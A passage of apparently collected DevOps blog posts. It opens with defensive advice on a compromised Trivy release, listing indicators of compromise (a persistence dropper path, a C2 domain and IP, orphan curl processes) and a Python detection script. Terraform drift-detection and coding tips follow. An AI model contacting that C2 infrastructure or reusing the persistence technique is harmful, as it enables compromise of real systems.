Audit your dependency automation. Renovate and Dependabot will happily adopt a version tag that was never part of an official release. If 0.34.2 doesn’t appear in a project’s changelog, something is wrong, but no bot is checking that. This is a systemic problem, but it’s worse when the upstream project has already demonstrated it can’t protect its own release infrastructure.

Check for the persistence dropper. If anyone on your team ran the v0.69.4 trivy binary locally, look for ~/.config/systemd/user/sysmon.py and its associated systemd unit. That machine needs to be treated as compromised. Wipe and rebuild; don’t just remove the files.
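A quick way to sweep workstations for the dropper is sketched below. The script path comes from the analysis above; the unit file name was not published here, so this assumes any user-level .service file that mentions sysmon.py is suspect. dropper_artifacts is a hypothetical helper name.

```python
from pathlib import Path


def dropper_artifacts(home: Path) -> list[Path]:
    """Return the dropper script and any systemd user units that reference it."""
    unit_dir = home / ".config" / "systemd" / "user"
    found = []
    script = unit_dir / "sysmon.py"
    if script.exists():
        found.append(script)
    if unit_dir.is_dir():
        # Assumption: the unit name is unknown, so match on content instead.
        for unit in sorted(unit_dir.glob("*.service")):
            try:
                if "sysmon.py" in unit.read_text(errors="ignore"):
                    found.append(unit)
            except OSError:
                continue
    return found
```

Call it with Path.home() for each user on the box. A hit is a reason to wipe and rebuild, not a cleanup checklist.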

Check your runner logs for orphan curl processes. Look for repositories named tpcp-docs on any GitHub account whose PAT was in scope. Block scan.aquasecurtiy.org and 45.148.10.212 at your network perimeter. As of this writing, the C2 is still live. And start planning your migration off Trivy today, not after the next compromise.

The upstream incident is tracked at aquasecurity/trivy#10425. Wiz’s detailed analysis of the broader attack is available here.

Terraform Drift Detection Powered by GitHub Actions

2025-12-11T00:00:00+00:00

TL;DR
Build a zero-cost drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.

The Problem

Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. RIP driftctl.

The Simplicity of GitHub Actions

I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform’s built-in exit codes and GitHub’s issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I’ll talk about that below).

The Workflow

Triggers and Permissions

The workflow runs on a daily schedule and supports manual execution via workflow_dispatch. We configure OIDC (id-token: write) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.

name: Terraform Drift Detection

# We can also add some fancy logic to extract this from a Dockerfile
# or versions.tf so we don't have to continually monitor and bump this.
env:
  TF_VERSION: 1.X.X

on:
  workflow_dispatch:
  schedule:
    - cron: "00 6 * * *" # Every day at 06:00 UTC

permissions:
  # This is required for requesting the JWT and opening issues
  id-token: write
  contents: read
  pull-requests: write
  issues: write

Finding Root Modules

This job dynamically discovers all Terraform root modules in the repository by searching for .tf files while excluding module subdirectories and Terraform’s cache. The find command output is transformed into a JSON array using jq, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run terraform plan against.

jobs:
  find-terraform-envs:
    name: 'Find Terraform Directories'
    runs-on: ubuntu-latest
    outputs:
      terraform-envs: ${{ steps.fetch-environments.outputs.dirs }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Fetch Environments
        id: fetch-environments
        run: |
          # Create a matrix of Terraform root modules
          DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')
          echo "dirs=$DIRS" >> "$GITHUB_OUTPUT"
          echo "Found environments: $DIRS"
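
If you want to debug the discovery logic outside of CI, the same find-and-jq pipeline can be approximated locally. This is a rough Python equivalent, not part of the workflow; terraform_roots and matrix_json are hypothetical names, and path separators assume a Unix-like system.

```python
import json
import os


def terraform_roots(top: str = ".") -> list[str]:
    """Directories containing .tf files, skipping modules/ and .terraform/ subtrees."""
    roots = set()
    for dirpath, dirnames, filenames in os.walk(top):
        # Pruning in place stops os.walk from descending into excluded directories.
        dirnames[:] = [d for d in dirnames if d not in {".terraform", "modules"}]
        if any(name.endswith(".tf") for name in filenames):
            roots.add(dirpath)
    return sorted(roots)


def matrix_json(top: str = ".") -> str:
    """Compact JSON array, the same shape the workflow writes to GITHUB_OUTPUT."""
    return json.dumps(terraform_roots(top), separators=(",", ":"))
```

Running matrix_json(".") from the repository root should list the same directories the job reports in its “Found environments” line.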

Credential Configuration and Setup

The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with fail-fast: false to ensure one environment’s failure doesn’t block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with terraform_wrapper: false to ensure clean exit code propagation. OIDC needs some additional setup on the AWS side for this to work (an IAM identity provider and a role that trusts it), but it’s the recommended approach for secure, keyless authentication.

  drift-detection:
    name: 'Drift Detection'
    runs-on: ubuntu-latest
    needs: find-terraform-envs
    if: needs.find-terraform-envs.outputs.terraform-envs != '[]'
    strategy:
      fail-fast: false
      matrix:
        tf_dir: ${{ fromJson(needs.find-terraform-envs.outputs.terraform-envs) }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4.1.0
        with:
          aws-region: us-east-1
          role-to-assume: ${{ secrets.AWS_ROLE_ARN }} # hypothetical secret name; point this at your own role ARN
          role-session-name: Drift_Detection

      - name: Set up Terraform
        uses: hashicorp/setup-terraform@v3.1.2
        with:
          terraform_version: ${{ env.TF_VERSION }}
          terraform_wrapper: false

      - name: Terraform Init
        working-directory: ${{ matrix.tf_dir }}
        run: terraform init -input=false

Detecting Drift

This is the core drift detection mechanism. With -detailed-exitcode, terraform plan returns one of three exit codes: 0 (no changes), 1 (error), or 2 (changes present, which for an unchanged main branch means drift). We capture the actual Terraform exit code using ${PIPESTATUS[0]} rather than $?, which would only return sed’s exit code. The plan output is filtered and saved for issue creation.

Technical Note: We use set +e to prevent immediate failure, -input=false to prevent hanging on interactive prompts, and -lock-timeout=5m to handle state locks gracefully.

      - name: Terraform Drift Detection Plan
        id: plan
        working-directory: ${{ matrix.tf_dir }}
        shell: bash
        run: |
          set +e # Disable exit on error for this step
          terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2>&1 | sed -n '/Terraform will perform the following actions:/,$p' > plan_output.txt
          EXIT_CODE=${PIPESTATUS[0]}
          echo "exit_code=$EXIT_CODE" >> "$GITHUB_OUTPUT"
          echo "EXIT_CODE=$EXIT_CODE" >> "$GITHUB_ENV"

          # Show the plan output
          cat plan_output.txt

          # Set drift detected flag
          if [ "$EXIT_CODE" -eq 2 ]; then
            echo "drift_detected=true" >> "$GITHUB_OUTPUT"
            echo "Drift detected in ${{ matrix.tf_dir }}"
          elif [ "$EXIT_CODE" -eq 1 ]; then
            echo "plan_failed=true" >> "$GITHUB_OUTPUT"
            echo "Plan failed in ${{ matrix.tf_dir }}"
          else
            echo "No drift detected in ${{ matrix.tf_dir }}"
          fi
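
The branching in this step is small enough to model in a few lines. The following Python sketch is not part of the workflow; classify_plan and plan_body are hypothetical names that mirror the exit-code handling and the sed range filter so the behavior can be checked in isolation.

```python
# Marker line the sed filter starts printing from.
PLAN_MARKER = "Terraform will perform the following actions:"


def classify_plan(exit_code):
    """Map a `terraform plan -detailed-exitcode` status to a workflow outcome."""
    if exit_code == 0:
        return "no_drift"
    if exit_code == 2:
        return "drift_detected"
    # 1 is the documented error code; anything unexpected is treated the same way.
    return "plan_failed"


def plan_body(output):
    """Keep everything from the marker line onward, like sed -n '/marker/,$p'."""
    lines = output.splitlines()
    for index, line in enumerate(lines):
        if PLAN_MARKER in line:
            return "\n".join(lines[index:])
    # No marker (for example, a failed plan) leaves nothing to report.
    return ""
```

One thing the model makes visible: a failed plan never prints the marker line, so the filtered output is empty and the error text is dropped by the filter as written. If plan failures matter to you, it may be worth saving the unfiltered output as well.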

Creating and Updating GitHub Issues

When drift is detected (exit code 2), this step uses the GitHub API via actions/github-script to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.

Security Note: Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.

      - name: Create or Update Issue on Drift Detection
        if: steps.plan.outputs.drift_detected == 'true'
        uses: actions/github-script@v7.0.1
        with:
          script: |
            const fs = require('fs');
            const path = require('path');
            let planOutput = '';
            try {
              planOutput = fs.readFileSync(path.join('${{ matrix.tf_dir }}', 'plan_output.txt'), 'utf8');
            } catch (error) {
              planOutput = 'Could not read plan output';
            }

            const title = `Terraform Drift Detected: ${{ matrix.tf_dir }}`;
            const driftBody = `## Terraform Drift Detected
            **Directory:** \`${{ matrix.tf_dir }}\`
            **Detection Time:** ${new Date().toISOString()}
            **Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})
            
            Plan Output

            \`\`\`
            ${planOutput}
            \`\`\`

            
            Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;

            // Search for existing open drift issue for this directory
            const issues = await github.rest.issues.listForRepo({
              owner: context.repo.owner,
              repo: context.repo.repo,
              state: 'open',
              labels: ['drift-detection']
            });

            const existingIssue = issues.data.find(issue =>
              issue.title.includes('Terraform Drift Detected') &&
              issue.title.includes('${{ matrix.tf_dir }}')
            );

            if (existingIssue) {
              // Update existing issue with new drift info
              await github.rest.issues.createComment({
                owner: context.repo.owner,
                repo: context.repo.repo,
                issue_number: existingIssue.number,
                body: `## New Drift Detected\n\n${driftBody}`
              });

              console.log(`Updated existing issue #${existingIssue.number}`);
            } else {
              // Create new issue
              const newIssue = await github.rest.issues.create({
                owner: context.repo.owner,
                repo: context.repo.repo,
                title: title,
                body: driftBody,
                labels: ['terraform', 'drift-detection', 'needs-review']
              });

              console.log(`Created new issue #${newIssue.data.number}`);
            }
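
The create-or-comment decision above can be sketched as a pure function. This Python version is illustrative only: the function names are hypothetical, open_issues stands in for the already-fetched API response, and it swaps the substring check for an exact title comparison. That swap is my assumption, not the original logic; with a substring match, a directory such as ./aws/us-east-1/dev/vpc would also match an issue opened for a hypothetical ./aws/us-east-1/dev/vpc-peering.

```python
TITLE_PREFIX = "Terraform Drift Detected: "


def tracking_title(tf_dir):
    """Build the issue title used to track drift for one Terraform directory."""
    return f"{TITLE_PREFIX}{tf_dir}"


def find_tracking_issue(open_issues, tf_dir):
    """Return the open issue whose title exactly matches this directory, if any."""
    wanted = tracking_title(tf_dir)
    for issue in open_issues:
        if issue["title"] == wanted:
            return issue
    return None


def next_action(open_issues, tf_dir):
    """Decide whether to comment on an existing issue or create a new one."""
    issue = find_tracking_issue(open_issues, tf_dir)
    if issue is None:
        return ("create", None)
    return ("comment", issue["number"])
```

The sketch also assumes every open drift issue is already in the list. The list endpoint is paginated, so a repository with many open drift issues would need to page through results before deciding.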

Key Benefits

This approach provides several engineering advantages:

Zero External Dependencies: No third-party SaaS tools or agents required
Native Exit Code Logic: Leverages Terraform’s detailed-exitcode for precise drift detection
Parallel Execution: Matrix strategy enables concurrent checks across multiple environments
Audit Trail: GitHub issues provide timestamped drift history and workflow run links
Secure Authentication: OIDC eliminates static credential management
Cost Effective: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)

The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.

Considerations for Production Use

While this workflow provides solid drift detection, you may want to enhance it for production environments:

Multi-Account Support: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure
Sensitive Data Handling: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration
Issue Lifecycle Management: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes
State Lock Handling: The -lock-timeout=5m provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications
Error Notification: Consider adding Slack/email notifications for plan failures in addition to GitHub issues
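
For the sensitive data handling item above, a redaction pass over the plan text before it reaches an issue could start from something like this Python sketch. The patterns (IPv4 addresses, 12-digit AWS account IDs, access key IDs beginning with AKIA) are assumptions about what counts as sensitive in your environment, and the redact helper is hypothetical. Treat it as a starting point rather than a complete sanitizer.

```python
import re

# (pattern, replacement) pairs applied in order; extend for your own environment.
REDACTIONS = [
    (re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"), "[REDACTED_IP]"),
    (re.compile(r"\b\d{12}\b"), "[REDACTED_ACCOUNT_ID]"),
    (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "[REDACTED_ACCESS_KEY]"),
]


def redact(text):
    """Replace every match of each sensitive pattern with its placeholder."""
    for pattern, replacement in REDACTIONS:
        text = pattern.sub(replacement, text)
    return text
```

Pattern-based redaction only catches what it has a pattern for, so it complements restricting who can read the issues and does not replace it.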

If you liked (or hated) this blog, feel free to check out my GitHub!

Terraform Tips from the IaC Trenches

2025-12-04T00:00:00+00:00

After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.

Use `one()` for Safer Conditional Resource References

When you conditionally create resources with count, don’t reach for [0] — use one().

The Problem

It’s common to use count with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = data.aws_route53_zone.this[0].zone_id  # ❌ Dangerous
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

This looks fine and might even work in dev environments where var.create_dns = true. But the moment that variable is false in another environment, you get:

Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.

The issue? Nothing flags the bad index until you plan an environment where the flag is false. The code works when the resource exists and breaks when it doesn’t.

The Solution

Use one() with the [*] splat operator:

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = one(data.aws_route53_zone.this[*].zone_id)  # ✅ Safe(r)
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

The one() function (available in Terraform v0.15+) is designed for this exact pattern:

If count = 0: Returns null gracefully instead of crashing
If count = 1: Returns the element’s value
If count ≥ 2: Returns an error (catches your mistake early)

When you use [0], you’re assuming the resource exists. When you use one(), you’re explicitly handling the case where it doesn’t.

Bonus: one() also works with sets, which don’t support index notation at all. Using one() makes the code more versatile and future-proof.
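
If it helps to see the three cases side by side, here is a small Python model of the behavior described above. It is an illustration of the semantics only, not Terraform’s implementation, and the error text is my own wording.

```python
def one(values):
    """Model of Terraform's one(): None for empty, the element for one, error otherwise."""
    items = list(values)  # accepts lists, tuples, and sets alike
    if len(items) == 0:
        return None
    if len(items) == 1:
        return items[0]
    raise ValueError("one() requires a collection with zero or one elements")
```

Note that a null result still has to be acceptable wherever it lands. A required argument such as zone_id will reject null, so the consuming resource usually needs the same count condition.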

Design Better Module Variables with Objects, `optional()`, and `coalesce()`

When building reusable Terraform modules, variable design makes the difference between a module that’s fun to use and one that’s a configuration nightmare. Here’s a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.

The Problem: Scattered Variables

Most modules start simple and grow organically, leading to an explosion of individual variables:

# ❌ Scattered variables - hard to manage and document
variable "elasticsearch_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Elasticsearch"
}

variable "elasticsearch_port" {
  type        = number
  description = "Port for Elasticsearch"
  default     = 9200
}

variable "elasticsearch_enable_ssl" {
  type        = bool
  description = "Enable SSL for Elasticsearch"
  default     = true
}

variable "kibana_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Kibana"
  default     = null
}

variable "kibana_port" {
  type        = number
  description = "Port for Kibana"
  default     = 5601
}

variable "kibana_enable_ssl" {
  type        = bool
  description = "Enable SSL for Kibana"
  default     = true
}

# ... and on and on for 12+ more variables

This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.

Use objects with the optional() function to group logically related settings:

# ✅ Grouped by logical component
variable "elasticsearch_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 9200)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Elasticsearch service.

    subdomain_name: The name of the subdomain for Elasticsearch in the DNS zone (e.g., 'elasticsearch', 'search'). Defaults to environment name.
    port: Port number for Elasticsearch. Defaults to 9200.
    enable_ssl: Enable SSL/TLS for Elasticsearch. Defaults to true.
  DOC
  default = {}
}

variable "kibana_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 5601)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Kibana service.

    subdomain_name: The name of the subdomain for Kibana in the DNS zone (e.g., 'kibana', 'ui'). Defaults to environment name.
    port: Port number for Kibana. Defaults to 5601.
    enable_ssl: Enable SSL/TLS for Kibana. Defaults to true.
  DOC
  default = {}
}

The optional() function (Terraform v1.3+) lets you define object attributes that users can omit:

subdomain_name = optional(string)        # Can be omitted, defaults to null
port           = optional(number, 9200)  # Can be omitted, defaults to 9200
enable_ssl     = optional(bool, true)    # Can be omitted, defaults to true

This means users can provide as much or as little configuration as they need:

# Minimal - just override subdomain
elasticsearch_settings = {
  subdomain_name = "search"
  # port and enable_ssl use defaults
}

# Or provide nothing, use all defaults
elasticsearch_settings = {}

# Or customize everything
elasticsearch_settings = {
  subdomain_name = "es-prod"
  port           = 9300
  enable_ssl     = false
}

HEREDOC Syntax for Documentation

Use indented HEREDOC (<<-DOC) to document complex object variables:

description = <<-DOC
  Configuration settings for Elasticsearch service.

  subdomain_name: The name of the subdomain for Elasticsearch in DNS.
  port: Port number for Elasticsearch. Defaults to 9200.
  enable_ssl: Enable SSL/TLS. Defaults to true.
DOC

Why the dash matters:

<<-DOC (with dash): Automatically strips leading whitespace, allowing proper indentation
<<DOC (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting



The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.

Smart Defaults with coalesce() and Context

Combine objects with the Terraform null label pattern (context.tf) to provide intelligent defaults:

# Use locals to apply coalesce logic
locals {
  elasticsearch_subdomain = coalesce(var.elasticsearch_settings.subdomain_name, module.this.environment)
  kibana_subdomain        = coalesce(var.kibana_settings.subdomain_name, module.this.environment)
}

# Resources reference the locals
resource "aws_route53_record" "elasticsearch" {
  zone_id = var.zone_id
  name    = "${local.elasticsearch_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.endpoint]
  ttl     = 300
}

resource "aws_route53_record" "kibana" {
  zone_id = var.zone_id
  name    = "${local.kibana_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.kibana_endpoint]
  ttl     = 300
}


The coalesce() function returns the first argument that is neither null nor an empty string, giving you:

Without user input (in “prod” environment):

  prod.rosesecurity.dev (both records fall back to the environment name)


With user override:
elasticsearch_settings = {
  subdomain_name = "search"
}

Results in: search.rosesecurity.dev

Let users configure only what matters, default the rest.
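
One detail worth knowing when relying on this fallback: Terraform’s coalesce() skips empty strings as well as nulls. A short Python model of that behavior, meant only to illustrate the semantics (the error wording is my own):

```python
def coalesce(*values):
    """Model of Terraform's coalesce(): first argument that is neither None nor ''."""
    for value in values:
        if value is not None and value != "":
            return value
    raise ValueError("coalesce: no non-null, non-empty-string arguments")
```

In practice this means a caller who passes subdomain_name = "" gets the same fallback as one who omits the attribute entirely.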

Group related variables into objects, use optional() for flexibility, document with indented HEREDOCs, and combine with coalesce() for intelligent defaults. Your module users will thank you.



Avoid Double Negatives in Variable Names

Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.

The Problem

# ❌ Negative variable name
variable "disable_encryption" {
  description = "Disable encryption"
  type        = bool
  default     = false
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.disable_encryption ? 0 : 1
  bucket = aws_s3_bucket.this.id
  # ...
}


The count line requires mental translation: “If disable_encryption is false, then count is 1, so encryption is enabled.” That’s a double negative in what should be straightforward logic.

This pattern creates real problems during code review. A change from default = false to default = true looks like it’s “enabling” something when it’s actually doing the opposite.

The Solution

# ✅ Positive variable name
variable "encryption_enabled" {
  description = "Enable encryption"
  type        = bool
  default     = true
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.encryption_enabled ? 1 : 0
  bucket = aws_s3_bucket.this.id
  # ...
}


The logic now reads directly: “If encryption_enabled is true, create the encryption config.”

Positive naming also makes security choices more explicit. Setting encryption_enabled = false is visually clearer than disable_encryption = true, even though they’re functionally equivalent.

Name variables for what they enable, not what they prevent.






KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever

2025-11-14T00:00:00+00:00

The Scale Gap Problem

Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.

Then you get to your actual production environment, and everything changes.

You’re not starting from scratch with a blank AWS account. You’ve got existing resources that were manually created two years ago by someone who left the company. There’s brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what’s actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.

Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You’re not just writing infrastructure code anymore. You’re trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.

This is the scale gap, and it’s where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.

The DRY Revolution: Solving Yesterday’s Problems

When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don’t Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.

Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented “best practices,” not necessarily because they had the specific problems these tools were designed to solve.

The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.

Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.

On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.

The Hidden Costs of Going DRY

When Abstractions Break, Troubleshooting Becomes Archaeological

It’s 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.

With a DRY setup using Terragrunt and hierarchical inheritance, you’re not just reading Terraform code. You’re tracing values through multiple layers: the root terragrunt.hcl with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.

Where did that database configuration value actually come from? The global config? The environment override? A module default? You’re playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.

The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.

The Onboarding Cliff

It’s a new team member’s first day and they need to update a security group rule in the staging environment. Simple enough, right?

With DRY abstraction tooling, they need to learn Terraform itself, your module library’s conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.

That’s not onboarding, that’s an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.

Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.

Ecosystem Lock-in: The Hidden Technical Debt

Once you’ve invested in a DRY abstraction framework, you’re locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.

Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool’s limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.

You’ve traded lines of code for organizational flexibility.

The KISS Alternative: Orchestration in Pipelines, Simplicity in Code

After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: pure Terraform with GitHub Actions orchestration.

This isn’t about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there’s a simpler path that works better.

The Core Insight: Complexity Can Only Be Relocated

Orchestration complexity across environments cannot be eliminated. You can’t wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.

The question isn’t “how do we eliminate complexity?” It’s “where do we put the complexity to minimize time to business value?”

DRY approach: Complexity lives in abstraction tooling and configuration hierarchies
KISS approach: Complexity lives in CI/CD pipelines, where it’s observable and debuggable

The Repo Structure: Nested and Navigable

├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/


Key characteristics:

  Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs
  Each service has its own state file, isolated blast radius
  Reusable modules in central directory
  No terraliths, no monolithic state files
  Completely navigable, you can grep for anything


Each service directory is a complete Terraform root module. Open aws/us-east-1/prod/eks/ and you see exactly what’s deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.

Yes, Backend Configs Repeat (And That’s Actually a Feature)

# aws/core-infrastructure/prod/backend.tf
terraform {
  backend "s3" {
    bucket         = "myorg-terraform-state-prod"
    key            = "core-infrastructure/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-state-lock-prod"
  }
}


This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.

When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don’t need to trace through dynamic generation logic. Running grep -r "myorg-terraform-state-prod" . shows me every environment using that bucket instantly.

The cost of repetition is about 100 lines of simple HCL across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.

Orchestration Lives in Pipelines

This is where the magic happens, and where the orchestration complexity actually belongs.

Home-grown GitHub Actions provide:

For Pull Requests:

  Auto-detect which environments changed based on file paths
  Run terraform plan for affected environments
  Post plan output as PR comment
  Run security/compliance checks
  Block merge on plan failures


For Main Branch:

  Auto-detect environments to apply
  Run terraform apply with approval gates
  Alert on failed applies
  Remediate orphaned resources
  Track drift and create tickets


Scheduled:

  Nightly drift detection across all environments
  Compare live state to code
  Alert on unexpected changes
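
The “auto-detect which environments changed” step in the lists above is mostly path arithmetic. Here is a minimal Python sketch, assuming the cloud/region/environment/service layout shown earlier; changed_roots, CLOUD_DIRS, and ROOT_DEPTH are hypothetical names, and the input would typically come from something like git diff --name-only.

```python
from pathlib import PurePosixPath

# Top-level provider directories from the repo layout (assumed).
CLOUD_DIRS = {"aws", "azure", "gcp"}
# A root module sits at <cloud>/<region>/<env>/<service>.
ROOT_DEPTH = 4


def changed_roots(changed_files):
    """Map changed file paths to the Terraform root modules that contain them."""
    roots = set()
    for name in changed_files:
        parts = PurePosixPath(name).parts
        # The file must live inside a service directory under a known provider.
        if len(parts) > ROOT_DEPTH and parts[0] in CLOUD_DIRS:
            roots.add("/".join(parts[:ROOT_DEPTH]))
    return sorted(roots)
```

This deliberately ignores changes under modules/. Deciding which environments a shared module change should re-plan is a separate question that depends on how modules are referenced.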


The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that’s invisible (which is exactly as it should be).

Addressing the Objections

“But You’re Repeating Backend Configurations!”

Yes. Intentionally.

100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt’s nuances. Which has a better ROI?

Repetition creates greppability. When investigating state issues, grep -r "bucket-name" . immediately shows every environment. No tracing through dynamic generation. No “where did this value come from?”

In infrastructure code, transparency trumps terseness every time.

“You Don’t Have Hierarchical Inheritance!”

Correct, and that’s also intentional.

Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you’re debugging the inheritance chain instead of the infrastructure.

Without inheritance, every value is explicit in the environment directory. New team members don’t need to learn your inheritance model, they just read the config.

The onboarding time saved pays for repeated config 100 times over.

“This Won’t Scale!”

It depends on what you mean by “scale.”

200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.

